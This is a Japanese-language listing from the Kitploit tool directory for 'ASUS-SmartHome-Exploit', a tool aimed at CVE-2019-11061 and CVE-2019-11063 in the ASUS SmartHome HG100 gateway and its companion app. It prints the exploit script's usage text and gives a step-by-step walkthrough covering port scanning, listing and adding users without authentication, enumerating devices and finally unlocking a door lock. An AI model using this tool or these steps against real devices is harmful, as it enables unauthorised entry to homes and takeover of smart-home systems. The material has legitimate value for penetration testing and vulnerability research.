Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ASUS-SmartHome-Exploit — CVE-2019-11061 および CVE-2019-11063 向けの ASUS SmartHome Exploit | Kitploit
ツール/GitHubGitHub/tim124058/asus-smarthome-exploit
IoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubtim124058/asus-smarthome-exploit

ASUS-SmartHome-Exploit

CVE-2019-11061 および CVE-2019-11063 向けの ASUS SmartHome Exploit

リポジトリを見る
2376年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ASUS-SmartHome-Exploit

CVE IDs

CVE-2019-11061 : HG100におけるアクセス制御の欠陥

影響を受ける製品 : ASUS SmartHome Gateway HG100 ファームウェアバージョン < 4.00.09

CVE-2019-11063 : SmartHomeアプリにおけるアクセス制御の欠陥

影響を受ける製品 : ASUS SmartHome Android APP バージョン < 3.0.45_190701

説明

攻撃者がHG100、またはcompanion APP(android もしくは iPhone)をインストールしたモバイルデバイスと同じ内部ネットワークにいる場合、攻撃者はそれらに制御リクエストを送信できます。

攻撃者はその後、認証なしで以下を行うことができます :
1. HG100に追加されているすべてのユーザー名を取得します。
2. SmartHome Gateway(HG100)配下のすべてのデバイス情報を取得します。
3. SmartHome Gateway配下の制御可能なすべてのデバイス(例: DoorLock、Meter Plug ...)を制御します。
以下はパスワード(4〜6桁、デフォルト: "0000")が必要です :
1. HG100にユーザーを追加します。

エクスプロイトの使用方法:

悪用可能なポートのスキャン :

root@kitploit:~
usage: exploit.py scan [-h] [-v] target_ip

scan exploitable port

positional arguments:
  target_ip   scan ip

optional arguments:
  -h, --help  show this help message and exit
  -v          show account email list

ターゲットにコマンドを送信 :

root@kitploit:~
usage: exploit.py cmd [-h]
                      (-u | -l | -s device_id | -c device_id status | -a username)
                      [--user username] [--new-user username] [-v]
                      target

send command to target

positional arguments:
  target                <target-ip>:<port>

optional arguments:
  -h, --help            show this help message and exit
  -u, --list-user       list all user in device
  -l, --list-device     list all device status
  -s device_id, --device-status device_id
                        list device status
  -c device_id status, --device-control device_id status
                        control device status
  -a username, --add-user username
                        add a user to device
  --user username       assign user for cmd
  --new-user username   create a new user for cmd
  -v                    show account email list

注記: 2019/5/15 - ASUSはSmartHome APP(3.0.42_190515)およびGateway(4.00.06)のアップデートをリリースしました。また、HTTPサービスにSSLが追加されました。しかし、この脆弱性は依然として存在します。このアップデートでは、"cmd"引数を使用する際にプロトコルを指定する必要があります。 例:
root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -l

使用例:

ステップ1:

androidまたはiPhone用のcompanion APPをインストールしたモバイルデバイスの悪用可能なポートをスキャン :
アプリのポート 追記: -v オプションは、HG100に追加されているユーザーを一覧表示します。

または

HG100の悪用可能なポートをスキャン :
HG100のポート

ステップ2:

HG100に追加されているすべてのユーザーを取得する: ユーザー一覧

または新しいユーザーを追加する: ユーザー追加

注記: "cmd" 引数には https://10.42.50.166:8083 を使用します。
例:

root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -u

ステップ3:

SmartHome Gateway配下のすべてのデバイス情報を取得する: デバイス一覧 追記: --user オプションが設定されていない場合、HG100内の最初のユーザーが自動的に選択されます。(パスワードが不要なため)

アプリとの比較:


ステップ4:

DoorLockを制御(ロック解除)します。 デバイス制御 追記: 1028 の値は -l オプション(ステップ3)から取得されます。

結果:

ツールをダウンロード